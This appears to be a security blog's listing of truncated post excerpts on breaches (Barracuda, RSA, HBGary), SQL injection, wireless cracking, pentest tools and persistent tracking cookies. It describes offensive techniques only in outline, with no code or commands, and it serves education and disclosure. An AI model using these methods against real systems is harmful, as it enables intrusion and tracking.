Expose unnecessary ports via NAT and firewall rules to your DMZ. I’m talking SSH, telnet, HTTP/S, SNMP, MS-SQL, MySQL, YourSQL, NetBIOS…. everything. If you’re really serious about getting compromised, NAT public addresses to your internal Active Directory servers and database.If you don’t have a firewall or a DMZ, all the better. Make sure no effective...Read More

SQL injection used to be a lot easier a few years ago when it was less known, web application security was less mature, and errors were often exposed. It’s very easy to use a variety of methods to cause errors to display database names, table names, column names, and even row values… when errors are...Read More

Barracuda Networks is latest on the list of security vendors/service providers to be compromised. The Malaysian group, “HMSec,” used blind SQL injection to retrieve database contents including emails, CMS logins, and MD5-hashed passwords. A poston barracudalabs.com titled “Learning the Importance of WAF Technology – the Hard Way” explains that, “The Barracuda Web Application Firewall in front of the Barracuda...Read More

RSA has announced that they have been compromised by an “extremely sophisticated cyber attack” of which details are not clear. All that is known is that RSA’s two-factor authentication seems to be affected. The degree to which this breach impacts their two-factor authentication solutions is not known and RSA has filed an 8-K with the SEC so don’t expect...Read More

CEO Aaron Barr decided to unmask who he thought was behind the leadership of attacks against MasterCard, Visa, and other perceived enemies of WikiLeaks. Before unmasking this individual, Barr spilled the beans and communicated his intended actions to this person. A custom written CMS application (http://www.hbgaryfederal.com) suffered from SQL injection, SQL injection in a URL...Read More

Although this doesn’t prove anything that hasn’t already been proven, seeing often cements belief much more effectively than reading. In this video, I compromise access to three separate wireless networks using three separate authentication and encryption schemes. Test Networks – The Victims: ClientCorporate: 802.1x/PEAP ClientVendor: WPA2-PSK/AES ClientGuest: WEP-128 PSK Full Disclosure – This video is...Read More

 Fierce is one of the best DNS enumeration tools I’ve ever used. It’s great for DNS servers that do not allow anonymous zone transfer as it includes dictionary-based hostname enumeration. A Perl script that enumerates an HTTPS instances supported SSL versions and ciphers.  The best FireFox extension, hands down, for manual web application security assessments....Read More

Collin Mulliner and Nico Golde gave a very interesting SMS DOS presentation at the 27th Choas Communication Congress. The just of it is that “feature phones,” cheaper, less-feature-rich phones sold by providers, as opposed to “smart phones” can accept and execute certain binary code from incoming SMS text messages. Networks often use this functionality to roll...Read More

Can you possibly defend the statement that 802.1x with PEAP or EAP-TTLS can be worse than open wireless with no authentication or encryption? Remember the old Cisco LEAP implementation that was vulnerable to offline brute-force attacks due to sending users’ MS CHAP v2 challenge/response outside of a secure connection? Joshua Wright has documented this in detail and even...Read More

As if HTTP cookies, Local Shared Objects (Flash cookies), and web developer’s understanding of them wasn’t a big enough security issue, Samy Kamkar has written a JavaScript API for “virtually irrevocable persistent cookies.”Want to keep track of users even after they remove their cookies, switch browsers, clear cache, or whatever? No problem, just throw a reference to...Read More